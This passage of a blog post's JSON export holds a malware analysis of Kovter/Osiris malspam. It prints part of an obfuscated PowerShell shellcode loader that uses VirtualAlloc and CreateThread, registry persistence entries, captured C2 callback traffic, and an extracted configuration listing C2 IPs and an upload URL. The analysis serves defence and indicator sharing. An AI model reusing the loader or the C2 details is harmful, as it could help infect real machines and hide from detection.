x75,0x0C,0x8B,0x4D,0x10,0xF3,0xA4,0x61,0x5D,0xC2,0x0C,0x00,<#bh#>0xD6,0x27,0xD1,0x58,0x00,0xA0,0x66,0x37,0x13,0x99,0x44,0x82,0x36,0x02,0xCF,0x82,0x58,0xCA,0x0B,0x78,0x64,0xB2,0xF7,0x99,0x2D,0x64,0xA7,<#nfv#>0xAB,0x5F,0x0D,0x9B,0xFB,0x45,0xC2,0x2B,0xAC,0x33,<#dxg#>0x55,0x13,0x8E,0xCC,0x66,0x63,0x12,0x97,0xED,0x6A,0xFE,0x7E,0x71,<#ay#>0x5B,0xED,<#fv#>0x2F,0xA4,0xC5,<#ong#>0xC7,0x8E,0x38,0x25,0xC9,0x97,0x04,<#ty#>0x16,0xB4,0x67,0xDD,0xFA,0x42,0x4F,0xBE,<#wp#>0x20,0x01,0x2D;\r\n#ebfvxkffvl\r\n$pr=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualAlloc),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32]) ([UInt32])))).Invoke(0,$sc32.Length,0x3000,0x40);\r\n#zfgd\r\nif($pr -ne 0){$memset=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc msvcrt.dll memset),(gdelegate @([UInt32],[UInt32],[UInt32]) ([IntPtr]))));\r\n#phjynzzoqx\r\nfor ($i=0;$i -le ($sc32.Length-1);$i++) {$memset.Invoke(($pr+$i), $sc32[$i], 1)};\r\n#lvytjj\r\n([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$pr,$pr,0,0);\r\n#pjqtttzp\r\n}sleep(1200);}catch{}exit;\r\n#usrucw\r\n#otlbloab<\/pre>\n
\"\"<\/a><\/p>\n
Like the two files that are dropped above, I am not sure what the difference is between the two regsvr32.exe processes. The parent process (PID 1740) is the process that keeps reaching out the C2s as seen in the image labeled “C2s.” This parent process is also responsible for creating and setting other registry keys\/values which looks to be somewhat related to what the “a2.exe” process was doing too (for persistence). <\/p>\n
\r\nPath: HKLM\\SOFTWARE\\Wow6432Node\\lqoiarkklq\\tscz\r\nType:\tREG_SZ\r\nLength:\t34\r\nData:\tc2lCgcJpAleIXg==\r\n\r\n-----\r\n\r\nPath: HKCU\\Software\\lqoiarkklq\\tscz\r\nType:\tREG_SZ\r\nLength:\t34\r\nData:\tdD9Hi8VsVasp+w==\r\n\r\n-----\r\n\r\nPath: HKLM\\SOFTWARE\\Wow6432Node\\lqoiarkklq\\rhllonear\r\nType:\tREG_SZ\r\nLength:\t66\r\nData:\tdW0V3ZU4UEEp\/bQvhCo\/2F9ajF1fefY=<\/pre>\n
Persistence is maintained via an entry in the “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run” registry key which comes up with an error when you try to view it as seen in the image below. <\/p>\n
\"\"<\/a><\/p>\n
Using “Autoruns” I am able to see that there is a pointer there in the registry and that it is pointing to the path of “C:\\Users\\Administrator\\AppData\\Local\\1354e279\\e7da1628.bat.” That file contains the following code:<\/p>\n
\r\nstart "yYPkyKv4BygZ9zHX9iqui6" "%LOCALAPPDATA%\\1354e279\\c3046d01.e5782001b"<\/pre>\n
The file that is being called in the batch file looks to be an encrypted file of sorts. <\/p>\n
From the network side, the malware seems to be pretty straight forward. Once the files have been downloaded from the Powershell script and have been executed, we can see the POST callbacks to a couple of different IP addresses.<\/p>\n
\r\nPOST \/checkupdate HTTP\/1.1\r\nAccept: *\/*\r\nAccept-Language: en-us\r\nReferer: http:\/\/194[.]31[.]59[.]5\/\r\nx-requested-with: XMLHttpRequest\r\nContent-Type: application\/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: 194[.]31[.]59[.]5\r\nContent-Length: 1103\r\nConnection: Keep-Alive\r\n\r\nZZd=%CFi%0FG%D7j%A0%3A%B4%A8%0Bd%B8%B3nU%DE%8F%A3%BF%A9q%CF%84%3C%23%E4%21&uunC=%07AT%95w%25%CE%5C%A9%186%CD%C0%9E%5D%1E%8Es%B2%98%DDS%96%BDx%1F%0E%1E%C3%DF%3CI%DA%E6%9E%E5%01%CA%3E%1D%E9I%E07%2CN%90%83&rhjQSF=.%D60%D1%9At%9FC%E1%1FA%14%5D%ED%B0&IwVFWpRk=%FF9v%C5%D0%067%AB%A4kN%AD%F4%FA%18i&nFzv=1%90%0Ap%3Fw%14%85-%FB%BDg%95-%02%22&yndZOvyk=s%D4%FBK%9F%26%26%7Es%FA%89%0F%29G%AF%BD%1Fe%1F%F0%DBB%3F%C962%A9%D1%80e%7C&lWdL=%89%DE%1BG%07%EA%B8%F6Q%21%DEH%7D%9F%D6L%92%C1%A1%0AC%B1%23%7C%8B%83%BA%AD%EF%8C%D8%BA%19%0B%CBYyT%89%80&lIRiyP=%80%AD%90%CCI%E6%9CP%F5i%04Z%C1Lb%01y%C9%C0%3F2%25%D8D%E9%E2%86%2C%AAsg%EDI%CA%84T78%9F%AB%1B%A3%C4%EF%CD%21&IzGlUb=%A6Q%28%C7%5B9F%03%90%0E%C6%1C%E2%F1%F1%1Cr1M%7B%FF%13%8F%92%D5%3E%3CL%D8Y%BB%BF3%5D%7F%BD%ED%EDp%B3d%8C&dPz=%A4x%91o%D50%7D%26%99%01%F3%8En%B4%BB%90r%18%F1%93%16%BA%E7%FB%E2%97%95%8C%B8%1A%3E2+%DCS%E0%9B&tUNM=%BAYi%93%8D%C3%40%CA%7Cx%EEJa%D3U%95%2Fu%AD&LZNBvnt=%83f%27%29%0Ag%5D%1Dg%A5%DC%2C%C1%0C%3B%01%09%AC%D8%7F%3F%3C%B88f%E3%11%C0%60%CE%8D%9F0%95Pk%91&bNZLk=%8F%A8_%C6%D5%10%C2%91%E3%EA%9B%5EsH%C6CT%A7%00%7F&dItZlk=%B6%F7%8E%14%83%A9%83%B0%ABgM\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\r\nDate: Fri, 03 Feb 2017 08:50:30 GMT\r\nContent-Type: application\/octet-stream\r\nContent-Length: 373\r\nConnection: keep-alive\r\n\r\nQ"..<m..Xr5..g.MR.;...!....]...lu..B7.u.K.C....l&......zPl.Ve.....+.G......._....<...;E..${E.{Q\t.. .....0.zc...r.....P\r\n.vy.j.qJ.L......@{,..A.'........Pj.f}3.=:......'\t8........2.k..E.".m`..5r....\t..x.D..6F......D..I..W.....l.{.\t.2w^.C4X.P.;.PP^V7.y.N.....Z......T..]m....8...#..,.ho..)..$...\t...y...3RH|#R..\t@t......d.....Hr.]....H.th$..c.Yt.x^.$7}.?.Dg.-....tykf.......&\r\n\r\n-----\r\n\r\n\/POST \/checkupdate HTTP\/1.1\r\nAccept: *\/*\r\nAccept-Language: en-us\r\nReferer: http:\/\/194[.]31[.]59[.]5\/\r\nx-requested-with: XMLHttpRequest\r\nContent-Type: application\/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: 194[.]31[.]59[.]5\r\nContent-Length: 690\r\nConnection: Keep-Alive\r\n\r\nSIyTD=%3E%E9%90%D6%BAh-%93%60C%D5%FC%DA%7C%B9%00&SjAVD=%BE%21%D9s%B6%D8%13U%5C%B3%CC%B8S%F9%F9FXO%8E%076%C7&FqiGQdBN=%2F%88B%A4%D9lo%BA%D6%06%1ER%CC%16H%E0%2F%E3%A2%BE%91%2F%BB%3C%D8%AA%05%91%B3xy%F9%B1&cXlYLNr=%7C%CE%C0%C9%5E%C4%DByY%BC%B2%2B%9C%BC%8B%BA%E9V%D7%D7%7E%5B%F8g%063%3C%F6F%1B%40C9%F0%5CI&KXLjATwr=%18y%E0%1F4%A3%2A%DB%06%14%7C%B6t%AF%15g%F5%C2D%F5%F1%BAC%DE%0F%80B%CF%D8%FB%8F%1C%C4%92%19%D0&sEREwsM=%86C%E2%B6%95%F9%CEK%0B%1F%1FT%97%3D%FBb%5C%8B%27Vq%99%94%D03j%81%E1B%8F%1F2%0A%A3%D0SB%BD&TEZc=P%7E%D5%0F%D3%92%B3%17%96%0A%A9%00%94%AB%86%DFp%9B%D8%13%98%C6E%8A%0Eq%05%1E%BFw%E1%0A%D6%A9%D6%B3%F5&ahXmRSFz=%5E%C1mAf%1A%29%99%B6%E9%8C%D9%AA%0D%DB%1E%8A%5Dtg%B8%D37OS%C2%83%F7L\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\r\nDate: Fri, 03 Feb 2017 08:50:31 GMT\r\nContent-Type: application\/octet-stream\r\nContent-Length: 1074\r\nConnection: keep-alive\r\n\r\n...a.n...[p..........f....z.@]..(=.~...X..Y)c.......C.x.n]j.)..........\\.......(..s.........K.N..:...Y.c..Y..e....F..3I.k.z.....~...\r\n\r\n-----\r\n\r\nPOST \/ HTTP\/1.1\r\nContent-Type: application\/x-www-form-urlencoded\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: 128[.]1[.]191[.]207\r\nContent-Length: 472\r\nCache-Control: no-cache\r\n\r\nJmwW3JA7UCEHHPM2MrS0nEz+ws7Z4gp6fZB4a79ARwr7p25dRmYz3EJYxn7vHsYlIuXGtijSuctDBxhvdOGEME+lttPV5RM8+awTwL4orbm4RsuyxUnzbflw2D+TguM62A4mCVujKnO4jAMHXSJTCzDGEXJjnaAwuI5Cctd7db5OXwKIm2b8gDDaglUOE7Ndw4hA\/WQomcVsIAYAFOLjrABReSiXQZB6reI+YpUfUGyFNMshy8tF4MD86Lrv6unosp1hQHdx3ojHO5B0d98TtSGOBViWWnmuGUo6GnIDOfF2Ge1cEgP3jUE9I+b5dWnMC4c+3vuF\/5zOvr5cogaw4fx7LehP1os5sf7mpbSsi5mYWuqgxnES1Z6qk2OgPDLGq6OyZ+Qa4DaGM\/nANLA3rNOvYO51WE7KdF8ze2AYgrE2NeO\/+7AIhMIlXkStX5igAnd+ph9yYIWtm3dsY9Vl5w==\r\n\r\nHTTP\/1.1 400 Bad Request\r\nContent-Type: text\/html\r\nDate: Fri, 03 Feb 2017 08:50:55 GMT\r\nConnection: close\r\nContent-Length: 39\r\n\r\n<h1>Bad Request (Invalid Hostname)<\/h1>\r\n\r\n-----\r\n\r\nPOST \/ HTTP\/1.1\r\nContent-Type: application\/x-www-form-urlencoded\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: 104[.]247[.]149[.]240\r\nContent-Length: 452\r\nCache-Control: no-cache\r\n\r\nd25A25FqWGqzdkND5TCryGWbNsWcd08JBGFDNKTFfQ7K9hgM43RuwLkP+htLhcmMdwSS+VRtiDprb67iwET1c0zGXK8scYQGJ0ni289fcN52qe8FsyqHJnH7u3CAG6o3MzmJBIoILYnLUTKo0aEwH2R9PWE5gVrUjx8SjYaTnr0BJlvYKRNmUJpqVE\/s6iK6UW9Xb0yrbrCw6Bc2jA+bNiN19F36G5MYISj1AkTn\/TIz57THvT\/R4YaHPHYPV+3TcsmZFpdup9KQ7AvAtksMNbOP5oMxLg8yAOx1hgkruEx7lt\/9oSwCFLyQH9V6ZjZuObT4RFm8QZQSXyq19J8oJOajur2AyBE0XTymvyWRPvVpx3o8kaaurX04ChaZm3EdqLrchfJ58uROXM04MOkhln53WbcliGaK9BOXttqjWFUDmtdFho7lq91zW1A\/8ghJxUE=\r\n\r\nHTTP\/1.1 301 Moved Permanently\r\nServer: nginx\/1.10.2\r\nDate: Fri, 03 Feb 2017 08:50:58 GMT\r\nContent-Type: text\/html\r\nContent-Length: 185\r\nConnection: keep-alive\r\nLocation: http:\/\/devel[.]highproxies[.]com\/\r\n\r\n<html>\r\n<head><title>301 Moved Permanently<\/title><\/head>\r\n<body bgcolor="white">\r\n<center><h1>301 Moved Permanently<\/h1><\/center>\r\n<hr><center>nginx\/1.10.2<\/center>\r\n<\/body>\r\n<\/html><\/pre>\n
It is here that we see a callback over HTTPS with a Let’sEncrypt SSL certificate:<\/p>\n
\r\n........}..X.Ds7.?....zyf..r.....N:lR...tW.....\/.5...\r\n.....\t.\r\n.2.8.......<..............devel.highproxies.com..........\r\n..................]...Y..X.Ds.M)F.Xl......08e-.`..F..i.6. ...a...<E@...h......E.."..>'.A`..........................\t...\t..\t....0...0...........%7..gN*8x........0\r\n.\t*.H..\r\n.....0J1.0\t..U....US1.0...U.\r\n.\r\nLet's Encrypt1#0!..U....Let's Encrypt Authority X30..\r\n161230090800Z.\r\n170330090800Z0 1.0...U....devel[.]highproxies[.]com0.."0\r\n.\t*.H..\r\n..........0..\r\n.......O..M!...C<?;.>..........[.d....|..1....V.%x........C\r\n-........\/.af..b..._:.V.8W$.b.a.XX..C......I`.L~.'w....v.pY...9.Q.....V..?9..i.1...r.r.....P...0.*..('t...~.`......=..U.E....OK....9"r...........?!.J...O.\/Y...}.J....R....7&23.....|.\t5I7.EkG.(R.O....Ri.........0...0...U...........0...U.%..0...+.........+.......0...U.......0.0...U......!1u......do..3...J..0...U.#..0....Jjc.}....9..Ee.....0p..+........d0b0\/..+.....0..#http:\/\/ocsp.int-x3.letsencrypt.org\/0\/..+.....0..#http:\/\/cert.int-x3.letsencrypt.org\/0 ..U....0...devel.highproxies.com0....U. ...0..0...g.....0....+..........0..0&..+.........http:\/\/cps.letsencrypt.org0....+.......0.....This Certificate may only be relied upon by Relying Parties and only in accordance with the Certificate Policy found at http:\/\/letsencrypt.org\/repository\/0<\/pre>\n
We can also see in Wireshark’s Conversations pane (see below) that there are attempts to talk to several IP addresses over port 8080 which failed since they never got a response (only 1 packet was sent).<\/p>\n
\"\"<\/a><\/p>\n
While letting Process Explorer run while I was looking into the Process Monitor logs and other things, I kept seeing the “regsvr.exe” process (PID 1740) constantly connecting to different IP addresses and ports. Since the capture on Wireshark had already finished, I fired up another one and let it capture some of that traffic. This time around I got different IP addresses (except for the one that is using HTTPS), and also different IP addresses trying to talk to port 8080 (see the image below). <\/p>\n
\"\"<\/a><\/p>\n
Seeing this, I used Strings2 to take a look into the regsvr.exe process to see if there was anything in there that may help give an idea of what the callbacks would be. Piping that out to a text file, I proceeded to look for keywords like “http” (3427 hits) and also “\/upload.php” (17 hits). Those hits reflect the following IP addresses.<\/p>\n
\r\n185[.]117[.]72[.]90\r\n189[.]177[.]220[.]156<\/pre>\n
The interesting thing here is that there is a block of text that is found when you look for “\/upload.php” in Notepad++ which contains 133 different IP addresses along with what, according to this article from PhishMe<\/a> states, is the configuration file for Kovter along with the updates to patch the system to the latest versions of Flash and .Net Frameworks. **Note: I came across the PhishMe link when looking up the term “nonuldnet32” in Google.<\/p>\n
\r\ncp1::150[.]219[.]156[.]87:80>59[.]34[.]180[.]235:38232>169[.]136[.]157[.]237:80>62[.]220[.]112[.]204:443>18[.]56[.]29[.]198:80>218[.]216[.]127[.]77:80>21[.]41[.]239[.]107:80>100[.]166[.]63[.]24:80>106[.]192[.]26[.]7:80>195[.]69[.]139[.]52:443>243[.]69[.]73[.]16:80>137[.]234[.]227[.]8:80>55[.]29[.]95[.]39:80>125[.]138[.]46[.]188:80>191[.]38[.]99[.]216:443>17[.]155[.]112[.]156:80>129[.]143[.]21[.]202:8080>32[.]84[.]137[.]4:443>191[.]59[.]120[.]31:80>255[.]155[.]235[.]46:80>141[.]236[.]125[.]239:80>169[.]1[.]96[.]26:443>48[.]155[.]43[.]68:443>202[.]100[.]184[.]83:80>20[.]19[.]162[.]140:80>3[.]140[.]205[.]238:80>37[.]123[.]165[.]161:443>106[.]74[.]107[.]202:80>8[.]249[.]254[.]51:80>99[.]252[.]161[.]28:80>9[.]48[.]98[.]170:80>147[.]173[.]72[.]96:443>1[.]132[.]22[.]166:443>129[.]16[.]111[.]236:80>210[.]243[.]212[.]209:8080>18[.]53[.]35[.]179:80>114[.]187[.]128[.]212:80>60[.]103[.]18[.]131:80>172[.]132[.]76[.]194:443>113[.]67[.]58[.]224:80>20[.]179[.]35[.]232:80>73[.]249[.]184[.]108:80>9[.]222[.]103[.]137:443>204[.]197[.]26[.]221:443>224[.]138[.]203[.]45:80>244[.]157[.]143[.]47:80>190[.]67[.]48[.]224:80>180[.]42[.]36[.]109:80>208[.]118[.]116[.]55:80>4[.]195[.]63[.]225:25900>32[.]107[.]214[.]76:80>203[.]233[.]71[.]250:443>6[.]61[.]150[.]230:80>75[.]16[.]138[.]183:80>90[.]45[.]25[.]145:443>63[.]149[.]238[.]126:80>249[.]158[.]225[.]208:80>156[.]211[.]224[.]150:43912>229[.]210[.]208[.]203:80>27[.]219[.]195[.]210:80>30[.]255[.]153[.]175:80>216[.]69[.]26[.]86:80>182[.]180[.]65[.]173:443>197[.]45[.]165[.]116:443>79[.]101[.]37[.]210:80>12[.]25[.]99[.]130:80>50[.]56[.]242[.]72:8080>187[.]108[.]195[.]8:8080>212[.]219[.]93[.]114:443>138[.]4[.]86[.]20:8080>132[.]247[.]145[.]147:443>209[.]159[.]149[.]156:443>202[.]191[.]121[.]100:443>20[.]243[.]155[.]227:443>53[.]128[.]177[.]21:8080>235[.]250[.]233[.]187:80>35[.]214[.]161[.]230:443>34[.]5[.]168[.]186:443>210[.]147[.]248[.]235:443>254[.]220[.]78[.]226:47857>130[.]99[.]108[.]151:443>87[.]145[.]98[.]19:80>133[.]232[.]247[.]107:80>25[.]111[.]58[.]211:80>13[.]102[.]27[.]247:80>205[.]246[.]43[.]28:80>229[.]157[.]60[.]81:8080>180[.]168[.]197[.]23:80>29[.]156[.]163[.]20:443>53[.]44[.]118[.]111:80>123[.]100[.]180[.]115:43893>129[.]105[.]221[.]156:443>194[.]58[.]126[.]20:80>50[.]188[.]52[.]73:80>80[.]228[.]26[.]99:80>143[.]97[.]189[.]141:32240>241[.]174[.]170[.]164:28721>20[.]129[.]203[.]86:80>6[.]211[.]88[.]116:80>20[.]168[.]78[.]137:80>163[.]91[.]30[.]241:27879>174[.]120[.]121[.]230:39788>39[.]144[.]13[.]86:80>142[.]34[.]249[.]209:443>204[.]42[.]154[.]209:80>66[.]32[.]198[.]58:80>105[.]149[.]112[.]90:80>238[.]9[.]247[.]103:80>141[.]127[.]109[.]227:35000>250[.]5[.]29[.]204:80>232[.]245[.]197[.]186:80>8[.]218[.]248[.]66:80>97[.]215[.]155[.]187:80>138[.]196[.]78[.]240:80>173[.]126[.]49[.]27:443>84[.]22[.]102[.]112:80>145[.]89[.]215[.]87:8080>10[.]94[.]237[.]3:80>25[.]100[.]119[.]180:443>206[.]63[.]226[.]28:80>149[.]201[.]173[.]198:80>15[.]26[.]248[.]116:8080>218[.]5[.]226[.]178:80>245[.]187[.]185[.]226:80>90[.]251[.]34[.]209:443>65[.]159[.]238[.]36:443>30[.]184[.]131[.]202:443>103[.]216[.]152[.]95:80>34[.]58[.]82[.]4:80>249[.]167[.]103[.]219:47074>192[.]214[.]135[.]145:80>199[.]48[.]116[.]234:80>163[.]109[.]92[.]34:42753>\r\n\r\ncp1cptm::30::cptmkey::a7887cc809cf0d4df17fc5dafd03e4e7::keypass::65537::20717578436666370206990156461786566788132748458910865354994919388630407187082788932551065567891365033974994995141358277530021944793516607142737605543772104350635734672485498640041982499636009940196953103877199811371834197299886690010229547993815721647414299018829914480336700775760032044922438942690008663278856440487164946050309668972730239620373400036156807226902415414689227139343695179004305146177952041410093920067335850237232148134221904306706694425837140102211178161590920721365317540938040383023194954613997204876850415109848188765254167924483000246775174171501733414326729845936854172715365200925796295269097::passdebug::0::debugelg::1::elgdl_sl::0::dl_slb_dll::0::b_dllnonul\r\n\r\nhttp:\/\/185[.]117[.]72[.]90\/upload2[.]php\r\nnonuldnet32::http:\/\/download[.]microsoft[.]com\/download\/0\/8\/c\/08c19fa4-4c4f-4ffb-9d6c-150906578c9e\/NetFx20SP1_x86[.]exe\r\ndnet32dnet64::http:\/\/download[.]microsoft[.]com\/download\/9\/8\/6\/98610406-c2b7-45a4-bdc3-9db1b1c5f7e2\/NetFx20SP1_x64[.]exe\r\ndnet64pshellxp::http:\/\/download[.]microsoft[.]com\/download\/E\/C\/E\/ECE99583-2003-455D-B681-68DB610B44A4\/WindowsXP-KB968930-x86-ENG[.]exe\r\npshellxppshellvistax32::http:\/\/download[.]microsoft[.]com\/download\/A\/7\/5\/A75BC017-63CE-47D6-8FA4-AFB5C21BAC54\/Windows6[.]0-KB968930-x86[.]msu\r\npshellvistax32pshellvistax64::http:\/\/download[.]microsoft[.]com\/download\/3\/C\/8\/3C8CF51E-1D9D-4DAA-AAEA-5C48D1CD055C\/Windows6[.]0-KB968930-x64[.]msu\r\npshellvistax64pshell2k3x32::http:\/\/download[.]microsoft[.]com\/download\/1\/1\/7\/117FB25C-BB2D-41E1-B01E-0FEB0BC72C30\/WindowsServer2003-KB968930-x86-ENG[.]exe\r\npshell2k3x32pshell2k3x64::http:\/\/download[.]microsoft[.]com\/download\/B\/D\/9\/BD9BB1FF-6609-4B10-9334-6D0C58066AA7\/WindowsServer2003-KB968930-x64-ENG[.]exe\r\npshell2k3x64cl_fv::24::cl_fvfl_fu::http:\/\/fpdownload[.]macromedia[.]com\/get\/flashplayer\/current\/licensing\/win\/install_flash_player_24_active_x[.]exe\r\nfl_fumainanti::DD1D:1:DD1DDD2D:1:DD2DDD3D:1:DD3DDD4D:1:DD4DDD5D:0:DD5DDD6D:1:DD6DDD7D:1:DD7DDD8D:1:DD8DDD9D:1:DD9DDD10D:1:DD10DDD11D:0:DD11DDD12D:1:DD12DDD13D:1:DD13DDD14D:1:DD14DDD15D:1:DD15DDD16D:1:DD16DDD17D:0:DD17Dal:http:\/\/185[.]117[.]72[.]90\/upload.php<\/pre>\n
And here is the IP addresses cleaned up from the list above. Please note that only a handful of the IP addresses used in the PCAPs are found in the list below:<\/p>\n
\r\n150[.]219[.]156[.]87:80\r\n59[.]34[.]180[.]235:38232\r\n169[.]136[.]157[.]237:80\r\n62[.]220[.]112[.]204:443\r\n18[.]56[.]29[.]198:80\r\n218[.]216[.]127[.]77:80\r\n21[.]41[.]239[.]107:80\r\n100[.]166[.]63[.]24:80\r\n106[.]192[.]26[.]7:80\r\n195[.]69[.]139[.]52:443\r\n243[.]69[.]73[.]16:80\r\n137[.]234[.]227[.]8:80\r\n55[.]29[.]95[.]39:80\r\n125[.]138[.]46[.]188:80\r\n191[.]38[.]99[.]216:443\r\n17[.]155[.]112[.]156:80\r\n129[.]143[.]21[.]202:8080\r\n32[.]84[.]137[.]4:443\r\n191[.]59[.]120[.]31:80\r\n255[.]155[.]235[.]46:80\r\n141[.]236[.]125[.]239:80\r\n169[.]1[.]96[.]26:443\r\n48[.]155[.]43[.]68:443\r\n202[.]100[.]184[.]83:80\r\n20[.]19[.]162[.]140:80\r\n3[.]140[.]205[.]238:80\r\n37[.]123[.]165[.]161:443\r\n106[.]74[.]107[.]202:80\r\n8[.]249[.]254[.]51:80\r\n99[.]252[.]161[.]28:80\r\n9[.]48[.]98[.]170:80\r\n147[.]173[.]72[.]96:443\r\n1[.]132[.]22[.]166:443\r\n129[.]16[.]111[.]236:80\r\n210[.]243[.]212[.]209:8080\r\n18[.]53[.]35[.]179:80\r\n114[.]187[.]128[.]212:80\r\n60[.]103[.]18[.]131:80\r\n172[.]132[.]76[.]194:443\r\n113[.]67[.]58[.]224:80\r\n20[.]179[.]35[.]232:80\r\n73[.]249[.]184[.]108:80\r\n9[.]222[.]103[.]137:443\r\n204[.]197[.]26[.]221:443\r\n224[.]138[.]203[.]45:80\r\n244[.]157[.]143[.]47:80\r\n190[.]67[.]48[.]224:80\r\n180[.]42[.]36[.]109:80\r\n208[.]118[.]116[.]55:80\r\n4[.]195[.]63[.]225:25900\r\n32[.]107[.]214[.]76:80\r\n203[.]233[.]71[.]250:443\r\n6[.]61[.]150[.]230:80\r\n75[.]16[.]138[.]183:80\r\n90[.]45[.]25[.]145:443\r\n63[.]149[.]238[.]126:80\r\n249[.]158[.]225[.]208:80\r\n156[.]211[.]224[.]150:43912\r\n229[.]210[.]208[.]203:80\r\n27[.]219[.]195[.]210:80\r\n30[.]255[.]153[.]175:80\r\n216[.]69[.]26[.]86:80\r\n182[.]180[.]65[.]173:443\r\n197[.]45[.]165[.]116:443\r\n79[.]101[.]37[.]210:80\r\n12[.]25[.]99[.]130:80\r\n50[.]56[.]242[.]72:8080\r\n187[.]108[.]195[.]8:8080\r\n212[.]219[.]93[.]114:443\r\n138[.]4[.]86[.]20:8080\r\n132[.]247[.]145[.]147:443\r\n209[.]159[.]149[.]156:443\r\n202[.]191[.]121[.]100:443\r\n20[.]243[.]155[.]227:443\r\n53[.]128[.]177[.]21:8080\r\n235[.]250[.]233[.]187:80\r\n35[.]214[.]161[.]230:443\r\n34[.]5[.]168[.]186:443\r\n210[.]147[.]248[.]235:443\r\n254[.]220[.]78[.]226:47857\r\n130[.]99[.]108[.]151:443\r\n87[.]145[.]98[.]19:80\r\n133[.]232[.]247[.]107:80\r\n25[.]111[.]58[.]211:80\r\n13[.]102[.]27[.]247:80\r\n205[.]246[.]43[.]28:80\r\n229[.]157[.]60[.]81:8080\r\n180[.]168[.]197[.]23:80\r\n29[.]156[.]163[.]20:443\r\n53[.]44[.]118[.]111:80\r\n123[.]100[.]180[.]115:43893\r\n129[.]105[.]221[.]156:443\r\n194[.]58[.]126[.]20:80\r\n50[.]188[.]52[.]73:80\r\n80[.]228[.]26[.]99:80\r\n143[.]97[.]189[.]141:32240\r\n241[.]174[.]170[.]164:28721\r\n20[.]129[.]203[.]86:80\r\n6[.]211[.]88[.]116:80\r\n20[.]168[.]78[.]137:80\r\n163[.]91[.]30[.]241:27879\r\n174[.]120[.]121[.]230:39788\r\n39[.]144[.]13[.]86:80\r\n142[.]34[.]249[.]209:443\r\n204[.]42[.]154[.]209:80\r\n66[.]32[.]198[.]58:80\r\n105[.]149[.]112[.]90:80\r\n238[.]9[.]247[.]103:80\r\n141[.]127[.]109[.]227:35000\r\n250[.]5[.]29[.]204:80\r\n232[.]245[.]197[.]186:80\r\n8[.]218[.]248[.]66:80\r\n97[.]215[.]155[.]187:80\r\n138[.]196[.]78[.]240:80\r\n173[.]126[.]49[.]27:443\r\n84[.]22[.]102[.]112:80\r\n145[.]89[.]215[.]87:8080\r\n10[.]94[.]237[.]3:80\r\n25[.]100[.]119[.]180:443\r\n206[.]63[.]226[.]28:80\r\n149[.]201[.]173[.]198:80\r\n15[.]26[.]248[.]116:8080\r\n218[.]5[.]226[.]178:80\r\n245[.]187[.]185[.]226:80\r\n90[.]251[.]34[.]209:443\r\n65[.]159[.]238[.]36:443\r\n30[.]184[.]131[.]202:443\r\n103[.]216[.]152[.]95:80\r\n34[.]58[.]82[.]4:80\r\n249[.]167[.]103[.]219:47074\r\n192[.]214[.]135[.]145:80\r\n199[.]48[.]116[.]234:80\r\n163[.]109[.]92[.]34:42753<\/pre>\n","protected":false},"excerpt":{"rendered":"
A little late for this write-up, but here is an example of some Kovter\/Osiris malspam that I was able to find from late last week. While researching some of the URLs below I came across My Online Security’s blog post which had the domains listed below. It looks as if they have been keeping tabs on these types of emails and the callbacks used as well. All artifacts from this investigation can be found in this Github repo located here. The attack is a simple one; phishing emails sent to users suggesting that the person has a UPS shipment that…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-716","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/716","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=716"}],"version-history":[{"count":8,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/716\/revisions"}],"predecessor-version":[{"id":736,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/716\/revisions\/736"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=716"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=716"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez